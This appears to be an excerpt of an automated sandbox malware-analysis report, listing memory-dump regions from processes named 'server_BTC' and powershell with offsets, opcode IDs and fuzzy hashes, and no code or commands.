• Instruction ID: cd172f39b45c7637cd8748abd8f3451824a841c81e373bbb0d72c6d66d782435
• Opcode Fuzzy Hash: 10b1bcb35326fc7b7de92238c60d692c906ed7b400689387cb8a18bcb9f05032
• Instruction Fuzzy Hash: A3E02BB1904245DFCB14DFB0DA466DDBBB1FB42204F0086AEC4099F656D7311F05D741
Memory Dump Source
• Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 83cab0d888d37770caf7c7bf4b5322cabb08ffb1cb212bdea58cd2ddd89c3b91
• Instruction ID: ed6d522500ab4a3955e90d18d5fe1e4fa86925780d77c3434f3bb01b51ab2552
• Opcode Fuzzy Hash: 83cab0d888d37770caf7c7bf4b5322cabb08ffb1cb212bdea58cd2ddd89c3b91
• Instruction Fuzzy Hash: B7E01AB8A00219DFC758EFB8E588A59BBF0FB49305F1042A9D908A7365E7319D85CB80
Memory Dump Source
• Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1213bdf658e2ad2844352c04c20911d116e0ae07002dd8495325265ed9abb758
• Instruction ID: 81fd5aa054b2c2cbb0c01dff146cbb1ae50ad223855b961d5b99e70f3a54102a
• Opcode Fuzzy Hash: 1213bdf658e2ad2844352c04c20911d116e0ae07002dd8495325265ed9abb758
• Instruction Fuzzy Hash: C8E026B090020AEFCB00EFF5E50565CB7F5FB01204F00856CC509A7200EB711F45D780
Memory Dump Source
• Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6e0df065989e2ef31decde147f802809aa3f22279b5b739ff4c0c1357a5daaa4
• Instruction ID: b3901f363f6594ded43b1ad4a391d16b5ecd4dbf71e1d9a4c46f421676559725
• Opcode Fuzzy Hash: 6e0df065989e2ef31decde147f802809aa3f22279b5b739ff4c0c1357a5daaa4
• Instruction Fuzzy Hash: ACE086708843409FD3558BB46805BB93BB4DB82321F02419ED4149B552D2780C41CB21
Memory Dump Source
• Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8ec2bd835c52cb3efad9f081d1df919a6152dc67222eee16b6690aa23cba1f4b
• Instruction ID: 229aa4e4930bea85f2edef2990e6929012250f06b89c9fbaed4a83c3a93be8c3
• Opcode Fuzzy Hash: 8ec2bd835c52cb3efad9f081d1df919a6152dc67222eee16b6690aa23cba1f4b
• Instruction Fuzzy Hash: 67E0C2B18883818FC3168FA0AA41754BB70AB43306F0651DAC1145F597E7784881C731
Memory Dump Source
• Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e203161c782f70c785d4869e26ec84a39bb2c4c297ec0001b23d2d22b804d292
• Instruction ID: 7f60423239e6c82585335b7ca1312fca4c3bcbb75995856e08bc9f99ec7185a5
• Opcode Fuzzy Hash: e203161c782f70c785d4869e26ec84a39bb2c4c297ec0001b23d2d22b804d292
• Instruction Fuzzy Hash: F3C08070C003099BD334DFF8B409B657BBCD742215F401158E51897741D7714480D7D5
Memory Dump Source
• Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fc8d03372210e6bdad3d09c4498ed9ea43a7f3d255082f3b10d1d381e1ade131
• Instruction ID: 1f2e3ac107e80444154f0f8dd2c773ef1c79e29c3a59dd9014dcfe9e07fb18fb
• Opcode Fuzzy Hash: fc8d03372210e6bdad3d09c4498ed9ea43a7f3d255082f3b10d1d381e1ade131
• Instruction Fuzzy Hash: 39C012B080424A9BD2249BD4A405B65B6ACD702205F40116CD61857605E771458097B5
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
Similarity
• API ID:
• String ID: {Yn^$Yn^
• API String ID: 0-3084620983
• Opcode ID: 31942878101b68d06c821d69943ed6c0775063d08cdc104f5713cce16ed87d01
• Instruction ID: ae61c1717c80c6b5f0698954d6fdf46908214e614f1b63ed489cb74d2476b652
• Opcode Fuzzy Hash: 31942878101b68d06c821d69943ed6c0775063d08cdc104f5713cce16ed87d01
• Instruction Fuzzy Hash: 24918EB0B016599FEB19DFB588545AEB7B2EFC8604B00891DD106AB380DF74AE068BD5
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
Similarity
• API ID:
• String ID: +/n^
• API String ID: 0-2444456302
• Opcode ID: 0907434324c3473c8f449751b5446f186f095d75a9307d9ff015d0f11d1a1c90
• Instruction ID: 1fff365051d656390e01f85944744942f1d580b261636bec745904914ce0220a
• Opcode Fuzzy Hash: 0907434324c3473c8f449751b5446f186f095d75a9307d9ff015d0f11d1a1c90
• Instruction Fuzzy Hash: DCE092712106226BD3056B2FD840AABBBDEDFC9275710481AE115D7340EFB4E81187E5
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
Similarity
• API ID:
• String ID: +/n^
• API String ID: 0-2444456302
• Opcode ID: 760aa78a0f232dd07db5798de2e41e1b3bad90f18eaa1ac76ed7d8a474751058
• Instruction ID: cddf6c2e2cba5ba10950220490a666fd86343b82f402b426eb59994285401b68
• Opcode Fuzzy Hash: 760aa78a0f232dd07db5798de2e41e1b3bad90f18eaa1ac76ed7d8a474751058
• Instruction Fuzzy Hash: 64E0C231700A125B8215A72FA8108AFB7DBDFC4675300882FE119D7340EE64EC0247E9
Memory Dump Source
• Source File: 0000000B.00000002.2298533561.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_6ec0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e3bd7949eda862715be679f5baffa1adcd1f66e1816a613501d01e6166c8d3a3
• Instruction ID: d05a14061f91d574c58c6018949ee7e998373d09258e6dc4b03c8c650637e3ed
• Opcode Fuzzy Hash: e3bd7949eda862715be679f5baffa1adcd1f66e1816a613501d01e6166c8d3a3
• Instruction Fuzzy Hash: 69220635F00305DFEB649F68C9417ABBBE6AF85224F14907EDA05DB251DB31CA42C7A2
Memory Dump Source
• Source File: 0000000B.00000002.2298533561.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_6ec0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2d0457cf83450953ec17f4865d457a915a3a4e0e2d64edc8bc0c871961c1e18d
• Instruction ID: 9dfee51504a561c2e9c54c28d9fda85070607d04f1856065378e725e336b4380
• Opcode Fuzzy Hash: 2d0457cf83450953ec17f4865d457a915a3a4e0e2d64edc8bc0c871961c1e18d
• Instruction Fuzzy Hash: A2124531B04351DFD7618B6899217AABFE29FC1224F14906ED545CF392DB32CC46C7A2
Memory Dump Source
• Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5f6f6a9a87e309448fd272246cece3fcd1dd4447cf6b6b2fc50dd683fbd122ab
• Instruction ID: d14bb3d7666e8fa31ab232efb56bd5108dd7066df087709acf99c41cad851c68
• Opcode Fuzzy Hash: 5f6f6a9a87e309448fd272246cece3fcd1dd4447cf6b6b2fc50dd683fbd122ab
• Instruction Fuzzy Hash: 10916974A00209CFCB15CF59C498ABAFBB6FF89310B288599D915AB365C735FC51CBA0
Memory Dump Source
• Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f7c257e2fb1d7bc33c215b8d4a87bf73a610cf373593ff6d1547a53e1b3fcefe
• Instruction ID: e60b831a725cf64b85d99d0429542f53e9f24023ff0e158bd015a69e53c071f2
• Opcode Fuzzy Hash: f7c257e2fb1d7bc33c215b8d4a87bf73a610cf373593ff6d1547a53e1b3fcefe
• Instruction Fuzzy Hash: 0D51F5343042059FE705DB7AD844A7A77E6FFC8214B15446AE909EB392EB35EC02CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 380515a1bed1070c3a2e5499e49511fe2d1db544569a21bea7dff8e2e642dc33
                                                                                                                • Instruction ID: f933f70cf41c476d223dd2298b229be2597a804fa76f38e5bc55b9db09b20e25
                                                                                                                • Opcode Fuzzy Hash: 380515a1bed1070c3a2e5499e49511fe2d1db544569a21bea7dff8e2e642dc33
                                                                                                                • Instruction Fuzzy Hash: B96138B0E01248DFDB54CFAAD484A9DFBF5EF88314F14816AE919BB354EB34A941CB50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8ad0e58656a575317acc1aceb7c8b564dcf1592b31cfbf1c2a470c4c4937cf9e
                                                                                                                • Instruction ID: 223f3c68c8a44cbbb1d0afe8d16d304fe374b5fd07ab2c907029dc1df7061305
                                                                                                                • Opcode Fuzzy Hash: 8ad0e58656a575317acc1aceb7c8b564dcf1592b31cfbf1c2a470c4c4937cf9e
                                                                                                                • Instruction Fuzzy Hash: 8A6115B1E00248DFDB54CFAAC584B9DBBF5EF88314F14816AE919BB254EB34AD41CB50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2298533561.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_6ec0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e914413a5dcf4ac98f66f2998f42696cb8d71ac2e558b228a5e285b337186e65
                                                                                                                • Instruction ID: 93a3340498965c19149fbeab5bc0aa25d4e03870e2abf29829c2c699a5d4b34f
                                                                                                                • Opcode Fuzzy Hash: e914413a5dcf4ac98f66f2998f42696cb8d71ac2e558b228a5e285b337186e65
                                                                                                                • Instruction Fuzzy Hash: 9341FC71E00311DFDB918F648A01BBABFB2AF81228F18D4AED9059F251D731DD46CBA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 860cf7cb5895882fd80c8682a2cd31d4bf593828ba395f57a0b31222c9db1e2b
                                                                                                                • Instruction ID: 77dee443663c4eb3d90816814b56405d73cf9d153146e609179fa9a74b84f4c7
                                                                                                                • Opcode Fuzzy Hash: 860cf7cb5895882fd80c8682a2cd31d4bf593828ba395f57a0b31222c9db1e2b
                                                                                                                • Instruction Fuzzy Hash: 13412B34B04205CFDB55DFA9C498AAEBBF2EB8D310F1554A8E406BB391DA35ED01CB61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 23715f995a5d67ef53d1c9b0bcd8528ea320134cad0a2e248b76f9c935675922
                                                                                                                • Instruction ID: f4ffe1c9957695a64b966c2ecd785669e830564d9472bc2382e01b890cc583e8
                                                                                                                • Opcode Fuzzy Hash: 23715f995a5d67ef53d1c9b0bcd8528ea320134cad0a2e248b76f9c935675922
                                                                                                                • Instruction Fuzzy Hash: 714145B4A00609CFCB05CF4AC5989BAFBB5FF49310B258599D915AB364C736FC61CBA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ade7d3a9d7ec54f9411bdd2e860262cc86a2fbe7b1560051d72e1af9fc6d479a
                                                                                                                • Instruction ID: 7c543a7dd55d264d21e1323e9e01b773721f90116373b416482de4017ce932a7
                                                                                                                • Opcode Fuzzy Hash: ade7d3a9d7ec54f9411bdd2e860262cc86a2fbe7b1560051d72e1af9fc6d479a
                                                                                                                • Instruction Fuzzy Hash: FA310734B04215CFDB54DFA6D498AAEBBF2EB89350F145068E402BB395DB36EC11CB61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ea4ffa2d3e50cf7b990b42fa393250c7cfcfc58735c8d7c720611597e5419e68
                                                                                                                • Instruction ID: a84bfebee96d2e72bfca9af5f8cd5efe073a43b06ff40aeed292f6fa8d89ab63
                                                                                                                • Opcode Fuzzy Hash: ea4ffa2d3e50cf7b990b42fa393250c7cfcfc58735c8d7c720611597e5419e68
                                                                                                                • Instruction Fuzzy Hash: 94319E313002029FE705DB79D894BAEB792EFC4314F048629D60ADB391DF75E846CBA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2a75d5f5c408c6738220780c781b4276bbcf734d5f7aeb74504fd20091282b13
                                                                                                                • Instruction ID: e8b2d704e6b036328109d6841fad919d4a6cdc78a38d1b1d52e5f2bc17c1d6ef
                                                                                                                • Opcode Fuzzy Hash: 2a75d5f5c408c6738220780c781b4276bbcf734d5f7aeb74504fd20091282b13
                                                                                                                • Instruction Fuzzy Hash: F0310DB0B002099FDB48DFBAD4947AEBBF6AF89354F148069E505E7350EB349D418F51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 555e2ee98e17dc101744029ede37f6cb3abc39c59494729e168e03d171d90b8a
                                                                                                                • Instruction ID: 7aa98b578c642b0812b5ea175f268c2db00c3c35da787afb584dd043fb79db47
                                                                                                                • Opcode Fuzzy Hash: 555e2ee98e17dc101744029ede37f6cb3abc39c59494729e168e03d171d90b8a
                                                                                                                • Instruction Fuzzy Hash: B9313971A0060ADFDB14DF69D594A9EBBF2FF88304F148528D416BB390DB34AD45CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 066f87172c087bbb6ddca9b5767530709f5067cea5958eee8b0a786a19964ead
                                                                                                                • Instruction ID: 4166fb36c8295f91ee8a6c9a455842a86ae8a0c976babf1d54cc47599869ea68
                                                                                                                • Opcode Fuzzy Hash: 066f87172c087bbb6ddca9b5767530709f5067cea5958eee8b0a786a19964ead
                                                                                                                • Instruction Fuzzy Hash: 3B3184B4A002499FEB05DFB4D855AFE77B6EF84304F1184A9D611BB394DB38AD418F60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 400c36a73cf6f7044200be655568b34ea499da79346db31c3362fecc6844081e
                                                                                                                • Instruction ID: f1aaa0764cc89480c41453a5631c9aabebb3b89073282f4fcff0577df5d85fbb
                                                                                                                • Opcode Fuzzy Hash: 400c36a73cf6f7044200be655568b34ea499da79346db31c3362fecc6844081e
                                                                                                                • Instruction Fuzzy Hash: DB312D70B002099FDB48DFBAD4947BEBBF6AF89314F148069E505E7350EA349D418F51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0061c411d5f9c90b6601b35154f21f9e6c7513468e9f60f4786f0b6a429b2794
                                                                                                                • Instruction ID: f518a89fd1a579e5f4af11ec19c34f42f5055d5b348205d2626f05de2e0092d2
                                                                                                                • Opcode Fuzzy Hash: 0061c411d5f9c90b6601b35154f21f9e6c7513468e9f60f4786f0b6a429b2794
                                                                                                                • Instruction Fuzzy Hash: 21313871A0060ADFDB14DF69D594AAEBBF2FF88304F148528D416BB390DB38AD45CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fac9d79781bf7df2d9fe5deb74393e8a97e8e930380ea338193e5f98587f2f33
                                                                                                                • Instruction ID: 38842ceefcdcdd2ab1be9f03593af9a99db8eaf94841c1ec4905960dea38cf7a
                                                                                                                • Opcode Fuzzy Hash: fac9d79781bf7df2d9fe5deb74393e8a97e8e930380ea338193e5f98587f2f33
                                                                                                                • Instruction Fuzzy Hash: F621DE71A042598FDB14DFAED844BAFBBF5EB88320F14846AD518A7340CB75A904CBA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5734799fdb006f0de36d61ea07a55ee583078d1f48ed8034a4085e3eac7622d5
                                                                                                                • Instruction ID: c1cd05063ddfe012152bbf9eef1236f5f7977261210023cf653275b720e708f4
                                                                                                                • Opcode Fuzzy Hash: 5734799fdb006f0de36d61ea07a55ee583078d1f48ed8034a4085e3eac7622d5
                                                                                                                • Instruction Fuzzy Hash: F0314870A002158FDB14DF69D498BAEBBF6EF88314F144569D806FB390DB79AC81CB91
                                                                                                                Memory Dump Source
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cb0bdd4cb6d4f863a0115c5272ab5405bb8691bb10f7f510990593dfda5ab7ee
                                                                                                                • Instruction ID: 0db2e1132b3b16a9d00483c04db9810b90054b8ebb5acda3f59ed61acdf84089
                                                                                                                • Opcode Fuzzy Hash: cb0bdd4cb6d4f863a0115c5272ab5405bb8691bb10f7f510990593dfda5ab7ee
                                                                                                                • Instruction Fuzzy Hash: 3D01F7315043559AE7504E25EAC0B67FFD8DF41324F18C019ED485B1D2C278EC42C6B2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2268631425.000000000402D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0402D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_402d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2cc9002437bb89e2b4a4a061e2c013b835cc46dfa7d3f99f97944afe42cb73e7
                                                                                                                • Instruction ID: 0b1c789a4b5cc1f86e9166f617f6f155cc1262ad04cb574c3f5df0f6252eb643
                                                                                                                • Opcode Fuzzy Hash: 2cc9002437bb89e2b4a4a061e2c013b835cc46dfa7d3f99f97944afe42cb73e7
                                                                                                                • Instruction Fuzzy Hash: 46015E6140E3D09EE7128B25D994B62BFB4EF43224F1D80CBD9889F1A3C2699849C772
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9b7b58837b9a4878e19177ccffad03542d3574f789238b5943b2bf70e0c110e6
                                                                                                                • Instruction ID: 4fcc9492552a9efaca2ff62e3473668d2407d2cc61b51f070d0cdfb607695871
                                                                                                                • Opcode Fuzzy Hash: 9b7b58837b9a4878e19177ccffad03542d3574f789238b5943b2bf70e0c110e6
                                                                                                                • Instruction Fuzzy Hash: 04F046317093129FE311A6B6AC409FF7BEADB892647040A2FE109C3642CE385C4183B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 04a3bc1521e5fb8a5a2141ce3cb97fca8206df6ebabfad14ca060ab54c644b9d
                                                                                                                • Instruction ID: 41015a51cf8ac81d9e0c36444d09750a235914b7745a3ff6f0adb840af1c80a1
                                                                                                                • Opcode Fuzzy Hash: 04a3bc1521e5fb8a5a2141ce3cb97fca8206df6ebabfad14ca060ab54c644b9d
                                                                                                                • Instruction Fuzzy Hash: EDF06D713052656FD7408A6A9C44ABBBFEDEF89621B14446AF944C7351DAB0D9108BA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ad03c1a242d6179b545ced2b435a4b94e8708b3215f9789addaefff3b42d9748
                                                                                                                • Instruction ID: 500cf2ab2e910ba01502e274ac8d613940f18b6db831598beb071f13b9b73f37
                                                                                                                • Opcode Fuzzy Hash: ad03c1a242d6179b545ced2b435a4b94e8708b3215f9789addaefff3b42d9748
                                                                                                                • Instruction Fuzzy Hash: F601DB71B041459FCB049F69D4544FDBFF5EF88320F14846AD506E7351EA319C21CB61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2268631425.000000000402D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0402D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_402d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1614f48f3e8b133d96effbdb3b51f6d73dab50a8693ed89a129f631805192af8
                                                                                                                • Instruction ID: 2621bbcd9fff45635b3a978c2b22b5869bbe3ab545876457f94ccf3752fd9d48
                                                                                                                • Opcode Fuzzy Hash: 1614f48f3e8b133d96effbdb3b51f6d73dab50a8693ed89a129f631805192af8
                                                                                                                • Instruction Fuzzy Hash: CBF04976200610AF9320CF0AC984C23FBADEFD4730719C15AF84A4B611C631FC41CAA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0999b5939ffde03ba2de8867eb55e0bad1747abb5797b048231bdfc75d759063
                                                                                                                • Instruction ID: 243e02d82070702e36e181a9cf31899c2f7ee32aa24ba3cba4fa7ed819f3593f
                                                                                                                • Opcode Fuzzy Hash: 0999b5939ffde03ba2de8867eb55e0bad1747abb5797b048231bdfc75d759063
                                                                                                                • Instruction Fuzzy Hash: 78F0F0F16002099BE7106F69C0487EBBBA5EBC131CF208029CD1917380DF393802CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2268631425.000000000402D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0402D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_402d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e89d9bea23105014653df10d7db2f4c98651247ee2d13620018f3b7a5073ea80
                                                                                                                • Instruction ID: bb158fda25351b277b7bd7ba3d786b4bc8746259099da74f69eadfdb6f132efc
                                                                                                                • Opcode Fuzzy Hash: e89d9bea23105014653df10d7db2f4c98651247ee2d13620018f3b7a5073ea80
                                                                                                                • Instruction Fuzzy Hash: 22F04975100A90AFD321CF06CD84D23BBB9EF85624B198489B84A5B352C630FC42CBA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
